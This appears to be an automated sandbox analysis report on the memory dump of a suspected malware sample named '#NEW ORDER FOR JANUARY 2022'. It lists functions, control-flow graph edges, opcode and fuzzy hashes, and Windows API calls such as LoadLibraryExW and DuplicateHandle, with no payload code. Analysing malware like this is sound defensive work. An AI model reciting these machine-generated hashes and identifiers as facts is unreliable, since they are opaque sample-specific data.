                                • Opcode ID: f6712468bf50ebfdaeab2bb9e11abb6f9df7c374207c2173241dcb02c2ad63d8
                                • Instruction ID: 09cb5d9bab54f8acfed70e1425da36408914458b0300221b427fcb8129c85813
                                • Opcode Fuzzy Hash: f6712468bf50ebfdaeab2bb9e11abb6f9df7c374207c2173241dcb02c2ad63d8
                                • Instruction Fuzzy Hash: 963259747046048FCB14DF39D498A6ABBF6FF89304B6584A9E906CB361DB30EC45CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581AB18, Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 334 581ab18-581ab3f 337 581ab41-581ab44 334->337 338 581ab5b-581ab67 334->338 339 581ab47-581ab59 337->339 340 581ab73-581ab98 338->340 341 581ab69 338->341 339->338 339->339 344 581ac15-581ac1b 340->344 345 581ab9a-581aba0 340->345 341->340 346 581ac62-581ac7c 344->346 347 581ac1d-581ac20 344->347 345->344 348 581aba2-581aba5 345->348 349 581ac22-581ac2d 347->349 350 581ac7f-581ac96 347->350 348->350 351 581abab-581abb6 348->351 352 581ac5c-581ac60 349->352 353 581ac2f-581ac45 349->353 362 581ac98-581ac9c 350->362 363 581ac9d-581acb5 350->363 355 581abb8-581abe6 351->355 356 581ac0f-581ac13 351->356 352->346 352->347 353->350 359 581ac47-581ac58 353->359 357 581abf2-581ac0c 355->357 358 581abe8 355->358 356->344 356->348 357->356 358->357 359->352 362->363 366 581acb7-581acbd 363->366 367 581acda-581ace3 363->367 368 581ace6-581acfe 366->368 369 581acbf-581acd7 366->369 372 581ad00-581ad04 368->372 373 581ad05-581ad0d 368->373 372->373 374 581ad13-581ad39 373->374 375 581ad97-581ad9e 373->375 377 581ada1-581adca 374->377 378 581ad3b-581ad41 374->378 383 581add6-581ae0a 377->383 384 581adcc-581adce 377->384 378->375 379 581ad43 378->379 380 581ad46-581ad49 379->380 380->377 382 581ad4b-581ad55 380->382 385 581ad81-581ad87 382->385 386 581ad57-581ad76 382->386 389 581ae10-581ae16 383->389 390 581afef-581b037 383->390 384->383 385->377 388 581ad89-581ad95 385->388 386->385 394 581ad78-581ad7e 386->394 388->375 388->380 392 581ae1c-581ae22 389->392 393 581aebf-581aec3 389->393 420 581b039 390->420 421 581b04d-581b059 390->421 392->390 397 581ae28-581ae32 392->397 395 581aec5-581aece 393->395 396 581aee6-581aeef 393->396 395->390 399 581aed4-581aee4 395->399 402 581aef1-581af10 396->402 403 581af13-581af16 396->403 400 581ae34-581ae3d 397->400 401 581ae9e-581aea7 397->401 405 581af19-581af1f 399->405 400->390 406 581ae43-581ae62 400->406 401->390 404 581aead-581aeb9 401->404 402->403 403->405 404->392 404->393 405->390 409 581af25-581af35 405->409 406->401 413 581ae64-581ae6a 406->413 409->390 412 581af3b-581af4b 409->412 412->390 415 581af51-581af5e 412->415 417 581ae76-581ae7c 413->417 418 581ae6c 413->418 415->390 416 581af64-581af84 415->416 416->390 427 581af86-581af9e 416->427 417->390 422 581ae82-581ae9b 417->422 418->417 426 581b03c-581b03e 420->426 423 581b065-581b081 421->423 424 581b05b 421->424 424->423 428 581b040-581b04b 426->428 429 581b082-581b09e 426->429 427->390 435 581afa0-581afab 427->435 428->421 428->426 436 581b0a0-581b0a4 429->436 437 581b0a5-581b0be 429->437 438 581afe5-581afec 435->438 439 581afad-581afb7 435->439 440 581b0c0-581b0c3 437->440 441 581b0c5-581b0c7 437->441 439->438 446 581afb9-581afdd 439->446 440->441 442 581b0c9-581b0cb 441->442 443 581b0cd-581b0d5 441->443 442->443 446->438
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 2419923b0f1836eca053af0e62c197a7ab837633ef14adfb6018419cfff454e3
                                • Instruction ID: 8190442369e52c0a39e5a753be6c4f1b1b1327acf79bbba2d264d9ebedc3fce4
                                • Opcode Fuzzy Hash: 2419923b0f1836eca053af0e62c197a7ab837633ef14adfb6018419cfff454e3
                                • Instruction Fuzzy Hash: CC229A316056068FCB24CF58C484DAABBF6FF84314B1AC669D959CB2A1E730FC55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811BDA0, Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 450 811bda0-811bdad 451 811bdc2-811bdc5 450->451 452 811bdaf-811bdbe call 811ac9c 450->452 454 811bdc7-811bdc8 451->454 455 811bddb-811bddf 451->455 452->451 505 811bdcd call 811c029 454->505 506 811bdcd call 811c038 454->506 456 811bde1-811bdeb 455->456 457 811bdf3-811be34 455->457 456->457 462 811be41-811be4f 457->462 463 811be36-811be3e 457->463 458 811bdd3-811bdd5 458->455 459 811bf10-811bfd0 458->459 500 811bfd2-811bfd5 459->500 501 811bfd8-811c003 GetModuleHandleW 459->501 465 811be51-811be56 462->465 466 811be73-811be75 462->466 463->462 468 811be61 465->468 469 811be58-811be5f call 811aca8 465->469 467 811be78-811be7f 466->467 471 811be81-811be89 467->471 472 811be8c-811be93 467->472 470 811be63-811be71 468->470 469->470 470->467 471->472 475 811bea0-811bea9 call 8116244 472->475 476 811be95-811be9d 472->476 481 811beb6-811bebb 475->481 482 811beab-811beb3 475->482 476->475 484 811bed9-811bee0 call 811c2f8 481->484 485 811bebd-811bec4 481->485 482->481 488 811bee3-811bee6 484->488 485->484 487 811bec6-811bed6 call 811aae8 call 811acb8 485->487 487->484 491 811bf09-811bf0f 488->491 492 811bee8-811bf06 488->492 492->491 500->501 502 811c005-811c00b 501->502 503 811c00c-811c020 501->503 502->503 505->458 506->458
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0811BFF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: aae88109ee4cab82dbbb3352944757d7a5101fb92f5339b1e6c1b4c527094239
                                • Instruction ID: e6b2a5388f8a213938361be73cc9fc35b3a87bc0f836ed18c9f4007a7ee0bc54
                                • Opcode Fuzzy Hash: aae88109ee4cab82dbbb3352944757d7a5101fb92f5339b1e6c1b4c527094239
                                • Instruction Fuzzy Hash: C3812670A05B058FDB64DF29D040B9ABBF1BF88215F10892DD58AD7B50DB35E806CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05813CF0, Relevance: 1.7, Strings: 1, Instructions: 450COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 508 5813cf0-5813d02 509 5813d04-5813d23 508->509 510 5813d2a-5813d2e 508->510 509->510 511 5813d30-5813d32 510->511 512 5813d3a-5813d49 510->512 511->512 513 5813d55-5813d81 512->513 514 5813d4b 512->514 518 5813fa2-5813fe7 513->518 519 5813d87-5813d8d 513->519 514->513 554 5813fe9 518->554 555 5813ffd-5814009 518->555 521 5813d93-5813d99 519->521 522 5813e56-5813e5a 519->522 521->518 523 5813d9f-5813dae 521->523 524 5813e5c-5813e65 522->524 525 5813e7f-5813e88 522->525 527 5813e35-5813e3e 523->527 528 5813db4-5813dc0 523->528 524->518 529 5813e6b-5813e7d 524->529 530 5813e8a-5813eaa 525->530 531 5813ead-5813eb0 525->531 527->518 532 5813e44-5813e50 527->532 528->518 533 5813dc6-5813ddd 528->533 534 5813eb3-5813eb9 529->534 530->531 531->534 532->521 532->522 536 5813de9-5813dfb 533->536 537 5813ddf 533->537 534->518 539 5813ebf-5813ed4 534->539 536->527 546 5813dfd-5813e03 536->546 537->536 539->518 541 5813eda-5813eec 539->541 541->518 544 5813ef2-5813eff 541->544 544->518 545 5813f05-5813f1c 544->545 545->518 553 5813f22-5813f3a 545->553 548 5813e05 546->548 549 5813e0f-5813e15 546->549 548->549 549->518 551 5813e1b-5813e32 549->551 553->518 559 5813f3c-5813f47 553->559 556 5813fec-5813fee 554->556 557 5814015-5814031 555->557 558 581400b 555->558 560 5813ff0-5813ffb 556->560 561 5814032-581406f 556->561 558->557 562 5813f49-5813f53 559->562 563 5813f98-5813f9f 559->563 560->555 560->556 571 5814071-5814074 561->571 572 581408b-5814097 561->572 562->563 567 5813f55-5813f6b 562->567 576 5813f77-5813f90 567->576 577 5813f6d 567->577 573 5814077-5814089 571->573 574 58140a3-58140c8 572->574 575 5814099 572->575 573->572 573->573 582 58140ca-58140d0 574->582 583 581413c-5814142 574->583 575->574 576->563 577->576 582->583 586 58140d2-58140d5 582->586 584 5814144-5814147 583->584 585 581418f-58141a9 583->585 587 5814149-5814156 584->587 588 58141ac-58141d1 584->588 586->588 589 58140db-58140e8 586->589 590 5814189-581418d 587->590 591 5814158-5814170 587->591 599 58141d3-58141d9 588->599 600 58141df-58141e3 588->600 593 5814136-581413a 589->593 594 58140ea-5814114 589->594 590->584 590->585 591->588 596 5814172-5814185 591->596 593->583 593->586 597 5814120-5814133 594->597 598 5814116 594->598 596->590 597->593 598->597 603 58141db 599->603 604 58141dd 599->604 605 58141e5-58141f5 600->605 606 5814209-581420e 600->606 603->600 604->600 605->606 608 58141f7-5814208 605->608
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: cabcb569e6638011ebd2d5e392ea6245a8b76030db0b8760816bbb85714751ce
                                • Instruction ID: b5441e68110f75845843a22e8ce0bef41f97dae3f657806174177dee3faa936d
                                • Opcode Fuzzy Hash: cabcb569e6638011ebd2d5e392ea6245a8b76030db0b8760816bbb85714751ce
                                • Instruction Fuzzy Hash: B7025434B006058FDB20DF59C48496AB7F6FF88324B25CA69D95ADB761DB30EC42CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581A3D8, Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 610 581a3d8-581a41d 615 581a480-581a482 610->615 616 581a41f-581a437 610->616 617 581a494 615->617 618 581a484-581a492 615->618 623 581a439-581a44f 616->623 624 581a478-581a47b 616->624 619 581a496-581a498 617->619 618->619 621 581a4fb-581a4fd 619->621 622 581a49a-581a4b2 619->622 625 581a50f 621->625 626 581a4ff-581a50d 621->626 635 581a4f3-581a4f6 622->635 636 581a4b4-581a4ca 622->636 631 581a451 623->631 632 581a458-581a476 623->632 627 581a7f6-581a804 624->627 628 581a511-581a513 625->628 626->628 640 581a806 627->640 641 581a80d-581a839 627->641 633 581a515-581a52d 628->633 634 581a576-581a578 628->634 631->632 632->624 649 581a52f-581a545 633->649 650 581a56e-581a571 633->650 638 581a58a 634->638 639 581a57a-581a588 634->639 635->627 651 581a4d3-581a4f1 636->651 652 581a4cc 636->652 642 581a58c-581a58e 638->642 639->642 640->641 671 581a8bf-581a8d2 641->671 672 581a83f-581a85d 641->672 647 581a5f1-581a5f3 642->647 648 581a590-581a5a8 642->648 653 581a605 647->653 654 581a5f5-581a603 647->654 663 581a5e9-581a5ec 648->663 664 581a5aa-581a5c0 648->664 665 581a547 649->665 666 581a54e-581a56c 649->666 650->627 651->635 652->651 657 581a607-581a609 653->657 654->657 661 581a60b-581a623 657->661 662 581a66c-581a66e 657->662 679 581a625-581a63b 661->679 680 581a664-581a667 661->680 668 581a680 662->668 669 581a670-581a67e 662->669 663->627 682 581a5c2 664->682 683 581a5c9-581a5e7 664->683 665->666 666->650 673 581a682-581a684 668->673 669->673 681 581a8d9-581a8dd 671->681 705 581a8d4 672->705 706 581a85f-581a89a 672->706 677 581a6e7-581a6e9 673->677 678 581a686-581a69e 673->678 685 581a6fb 677->685 686 581a6eb-581a6f9 677->686 698 581a6a0-581a6b6 678->698 699 581a6df-581a6e2 678->699 700 581a644-581a662 679->700 701 581a63d 679->701 680->627 687 581a8e8-581a8e9 681->687 688 581a8df 681->688 682->683 683->663 690 581a6fd-581a6ff 685->690 686->690 708 581a908-581a980 687->708 688->687 696 581a701-581a719 690->696 697 581a762-581a764 690->697 715 581a71b-581a731 696->715 716 581a75a-581a75d 696->716 703 581a776 697->703 704 581a766-581a774 697->704 717 581a6b8 698->717 718 581a6bf-581a6dd 698->718 699->627 700->680 701->700 709 581a778-581a77a 703->709 704->709 705->681 752 581a89d call 581aa20 706->752 753 581a89d call 581aa30 706->753 712 581a79a-581a7b2 709->712 713 581a77c-581a77e 709->713 730 581a7f3 712->730 731 581a7b4-581a7ca 712->731 721 581a790 713->721 722 581a780-581a78e 713->722 728 581a733 715->728 729 581a73a-581a758 715->729 716->627 717->718 718->699 723 581a792-581a794 721->723 722->723 723->708 723->712 728->729 729->716 730->627 739 581a7d3-581a7f1 731->739 740 581a7cc 731->740 738 581a89f-581a8bd 738->671 738->672 739->730 740->739 752->738 753->738
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: sZch^
                                • API String ID: 0-1042238138
                                • Opcode ID: 312a98100e5e9d75c29510fcd719fe4f3421646b6a67fdc1a231d86ae7c32b1c
                                • Instruction ID: 2f46eeec50ab25225775fed5236ec6a371f82d5b7ccaaf0bb1bc2af91fb28b6b
                                • Opcode Fuzzy Hash: 312a98100e5e9d75c29510fcd719fe4f3421646b6a67fdc1a231d86ae7c32b1c
                                • Instruction Fuzzy Hash: 71E19470B056068BCB15EF6CE451AAE73BAFF85608F508828DD16DB354EF34DD468B84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811D724, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 754 811d724-811e2be 756 811e2c0-811e2c6 754->756 757 811e2c9-811e2d0 754->757 756->757 758 811e2d2-811e2d8 757->758 759 811e2db-811e37a CreateWindowExW 757->759 758->759 761 811e383-811e3bb 759->761 762 811e37c-811e382 759->762 766 811e3c8 761->766 767 811e3bd-811e3c0 761->767 762->761 767->766
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0811E36A
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f945c182ad624b3c967a5ff2fc9a3282b15ff70f0276828c513b24bf882db551
                                • Instruction ID: fb986ae60775954721a98f8268f4f896e9a3a177e57268f2d8c906635a70d214
                                • Opcode Fuzzy Hash: f945c182ad624b3c967a5ff2fc9a3282b15ff70f0276828c513b24bf882db551
                                • Instruction Fuzzy Hash: 1751AEB1D103099FDF14CFDAD884ADEBBB5BF48314F24862AE819AB210D7759985CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 081159A0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 768 81159a0-81159a4 769 8115980-8115994 768->769 770 81159a6-81159a7 768->770 772 81159a8-8115a3c DuplicateHandle 770->772 773 8115a45-8115a62 772->773 774 8115a3e-8115a44 772->774 774->773
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0811596E,?,?,?,?,?), ref: 08115A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: db52a186dc4a162f37e5f12dd4dad9146ade89a5a9c30130c298e379956524ce
                                • Instruction ID: 42bb09a8b5b32aa67fccbf755b8cb00eb48f8c86a468b26df7c18ab71d594dca
                                • Opcode Fuzzy Hash: db52a186dc4a162f37e5f12dd4dad9146ade89a5a9c30130c298e379956524ce
                                • Instruction Fuzzy Hash: 463119B59002089FDB10CFA9E484ADEBFF5FB88325F14801AE915A3350D774A955CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 081153EC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 777 81153ec-8115a3c DuplicateHandle 779 8115a45-8115a62 777->779 780 8115a3e-8115a44 777->780 780->779
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0811596E,?,?,?,?,?), ref: 08115A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c5712d4bd6064caa5181f1cead3f6a8ce0f065edf75597e3deead6c79e56dfc3
                                • Instruction ID: d28c8b01f6b366e4af95c05aba3380fef38439122b722f1c77af68a72bca7b89
                                • Opcode Fuzzy Hash: c5712d4bd6064caa5181f1cead3f6a8ce0f065edf75597e3deead6c79e56dfc3
                                • Instruction Fuzzy Hash: 8721E3B59002089FDF10CFAAD884AEEBBF5EF48324F14842AE915B7310D774A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811ACE0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 783 811ace0-811c238 785 811c240-811c26f LoadLibraryExW 783->785 786 811c23a-811c23d 783->786 787 811c271-811c277 785->787 788 811c278-811c295 785->788 786->785 787->788
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0811C071,00000800,00000000,00000000), ref: 0811C262
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 7d18add862a62b06f8187bfe23cd48dc2c9da6a760ebefa174384044e1d73318
                                • Instruction ID: 8c879d6f50c065db597247ab80699f66a19d060a66fa07368e3334fc954c12fd
                                • Opcode Fuzzy Hash: 7d18add862a62b06f8187bfe23cd48dc2c9da6a760ebefa174384044e1d73318
                                • Instruction Fuzzy Hash: 6211F2B69002098BDB10CF9AD484A9EFBF4AB58710F10852ED919B7200C775A545CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05815F70, Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 791 5815f70-5815f8b 792 5815f97-5815fa6 791->792 793 5815f8d-5815f8f 791->793 794 5815fb2-5815fc2 792->794 795 5815fa8 792->795 793->792 857 5815fc3 call 5815f60 794->857 858 5815fc3 call 5815f70 794->858 795->794 796 5815fc5-5815fe7 797 5816220-5816267 796->797 798 5815fed-5815ff3 796->798 828 5816269 797->828 829 581627d-5816289 797->829 799 5815ff9-5815fff 798->799 800 58160cc-58160d0 798->800 799->797 804 5816005-5816012 799->804 801 58160f3-58160fc 800->801 802 58160d2-58160db 800->802 806 5816121-5816124 801->806 807 58160fe-581611e 801->807 802->797 805 58160e1-58160f1 802->805 808 5816018-5816021 804->808 809 58160ab-58160b4 804->809 810 5816127-581612d 805->810 806->810 807->806 808->797 812 5816027-5816048 808->812 809->797 813 58160ba-58160c6 809->813 810->797 817 5816133-5816146 810->817 814 5816054-581606f 812->814 815 581604a 812->815 813->799 813->800 814->809 823 5816071-5816077 814->823 815->814 817->797 818 581614c-581615c 817->818 818->797 822 5816162-581616f 818->822 822->797 824 5816175-581619a 822->824 826 5816083-5816089 823->826 827 5816079 823->827 824->797 840 58161a0-58161b8 824->840 826->797 834 581608f-58160a8 826->834 827->826 831 581626c-581626e 828->831 832 5816295-58162b1 829->832 833 581628b 829->833 835 5816270-581627b 831->835 836 58162b2-58162e3 831->836 833->832 835->829 835->831 843 58162e5 836->843 844 58162ef-58162f6 836->844 840->797 847 58161ba-58161c5 840->847 843->844 848 58161c7-58161d1 847->848 849 5816216-581621d 847->849 848->849 851 58161d3-58161e9 848->851 853 58161f5-581620e 851->853 854 58161eb 851->854 853->849 854->853 857->796 858->796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 80bc7127447f1f104d63bf34b39aaaf49e1d85089c7251e598f20ff9d07cb75e
                                • Instruction ID: 64eb64b756f97f2cf90ef672789db7d420adcb20679abe0671099bf6016cd623
                                • Opcode Fuzzy Hash: 80bc7127447f1f104d63bf34b39aaaf49e1d85089c7251e598f20ff9d07cb75e
                                • Instruction Fuzzy Hash: BEC169346006028FCB14CF59D484D6ABBF6FF88314B26C958D99ACBA61EB30FC45CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811BF90, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 859 811bf90-811bfd0 860 811bfd2-811bfd5 859->860 861 811bfd8-811c003 GetModuleHandleW 859->861 860->861 862 811c005-811c00b 861->862 863 811c00c-811c020 861->863 862->863
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0811BFF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: c2063b920ba8cfb4c25c582c23d3bc2664c141739b31a65fa74d70cf57857d17
                                • Instruction ID: 1f49de961c5c44a53ce988d19558f41b60fe6b575a8d54ea86b170f6fe66099c
                                • Opcode Fuzzy Hash: c2063b920ba8cfb4c25c582c23d3bc2664c141739b31a65fa74d70cf57857d17
                                • Instruction Fuzzy Hash: F6110FB6C006498FCB20CF9AD444BDEFBF4AF88224F10852AD429B7600C778A545CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814E48, Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 865 5814e48-5814ea0 call 5814bf0 870 5814ea2-5814ea4 865->870 871 5814ea6-5814eaa 865->871 872 5814eb0-5814ed3 870->872 871->872 877 5814ed5-5814eda 872->877 878 5814edf-5814eeb 872->878 879 5814fbb-5814fc1 877->879 883 5814eed-5814efe call 58144f0 878->883 884 5814f1e-5814f2a 878->884 880 5814fc3 879->880 881 5814fc7-5814fe7 879->881 880->881 895 5814ff3-5815008 881->895 896 5814fe9-5814fee 881->896 892 5814f03-5814f19 883->892 888 5814f36-5814f4a 884->888 889 5814f2c-5814f31 884->889 902 5814fb6 888->902 903 5814f4c-5814f6e 888->903 889->879 892->879 909 581508b 895->909 910 581500e-581501e 895->910 899 5815090-581509e 896->899 905 58150a0-58150a4 899->905 906 58150b6-58150c2 899->906 902->879 921 5814f70-5814f92 903->921 922 5814f94-5814fad 903->922 911 58150ac-58150ae 905->911 914 58151a6-58151da 906->914 915 58150c8-58150e4 906->915 909->899 918 5815020-5815030 910->918 919 5815032-5815037 910->919 911->906 940 58151f2-58151f4 914->940 941 58151dc-58151f0 914->941 930 5815192-58151a0 915->930 918->919 925 5815039-5815049 918->925 919->899 921->902 921->922 922->902 942 5814faf-5814fb4 922->942 938 5815052-5815062 925->938 939 581504b-5815050 925->939 930->914 935 58150e9-58150f2 930->935 936 58153b1-58153c6 935->936 937 58150f8-581510b 935->937 954 58153c8-58153cc 936->954 955 58153cd-58153d8 936->955 937->936 943 5815111-5815123 937->943 952 5815064-5815069 938->952 953 581506b-581507b 938->953 939->899 945 5815224-5815264 940->945 946 58151f6-5815208 940->946 941->940 942->879 957 5815125-5815131 943->957 958 581518f 943->958 1034 5815266 call 5815a91 945->1034 1035 5815266 call 5815aa0 945->1035 946->945 962 581520a-581521c 946->962 952->899 969 5815084-5815089 953->969 970 581507d-5815082 953->970 954->955 960 581546c-58154bd 955->960 961 58153de-58153e0 955->961 957->936 963 5815137-581518c 957->963 958->930 996 58154cd-58154d7 960->996 997 58154bf-58154cc 960->997 961->960 966 58153e6-58153e8 961->966 962->945 963->958 966->960 971 58153ee-58153f2 966->971 969->899 970->899 971->960 972 58153f4-58153f8 971->972 975 581540a-581544c 972->975 976 58153fa-5815408 972->976 974 581526c-5815280 988 5815282-5815299 974->988 989 58152c7-58152de 974->989 983 5815454-5815469 975->983 976->983 1002 58152a7-58152bf call 58144f0 988->1002 1003 581529b-58152a5 988->1003 1036 58152e0 call 5816589 989->1036 1037 58152e0 call 5816598 989->1037 1038 58152e0 call 58166b8 989->1038 1005 58154e6-58154ec 996->1005 1006 58154d9-58154e4 996->1006 999 58152e6-5815314 1015 5815316-581532f 999->1015 1016 5815368-581537f 999->1016 1002->989 1003->1002 1014 58154ee-5815534 1005->1014 1006->1014 1023 5815331 1015->1023 1024 5815339-5815365 1015->1024 1021 5815381-581538a 1016->1021 1022 58153a5-58153ae 1016->1022 1032 581538d call 581bc28 1021->1032 1033 581538d call 581bc38 1021->1033 1023->1024 1024->1016 1026 5815393-581539c 1026->1022 1032->1026 1033->1026 1034->974 1035->974 1036->999 1037->999 1038->999
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: #e
                                • API String ID: 0-1732277802
                                • Opcode ID: ec6cdde2580992d48a10f5db2fbc499fa8c242c9649846d31b78745dd3f3be11
                                • Instruction ID: e83f43ed18f7560aecf57a1df20f6fec8f91355175981cf6c53e65e6fdffc439
                                • Opcode Fuzzy Hash: ec6cdde2580992d48a10f5db2fbc499fa8c242c9649846d31b78745dd3f3be11
                                • Instruction Fuzzy Hash: C5B118347006048FCB14DF79D498A6ABBF6FF89604B2584A9E946DB3B1DB30ED05CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176ED00, Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1039 176ed00-176ed13 1040 176ed15-176ed17 1039->1040 1041 176ed1f-176ed44 1039->1041 1040->1041 1043 176ee97-176eee7 1041->1043 1044 176ed4a-176ed4f 1041->1044 1045 176ed51 1044->1045 1046 176eda9-176edae 1044->1046 1047 176ed54-176ed57 1045->1047 1049 176edb0-176edb9 1046->1049 1050 176edce-176edd7 1046->1050 1047->1043 1051 176ed5d-176ed69 1047->1051 1049->1043 1052 176edbf-176edcc 1049->1052 1053 176edf0-176edf6 1050->1053 1054 176edd9-176eded 1050->1054 1056 176ed8c-176ed95 1051->1056 1057 176ed6b-176ed80 1051->1057 1055 176edf9-176ee02 1052->1055 1053->1055 1054->1053 1055->1043 1059 176ee08-176ee30 1055->1059 1056->1043 1060 176ed9b-176eda7 1056->1060 1057->1056 1067 176ed82-176ed8b 1057->1067 1059->1043 1062 176ee32-176ee50 1059->1062 1060->1046 1060->1047 1065 176ee52-176ee5c 1062->1065 1066 176ee8a-176ee96 1062->1066 1065->1066 1070 176ee5e-176ee82 1065->1070 1070->1066
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
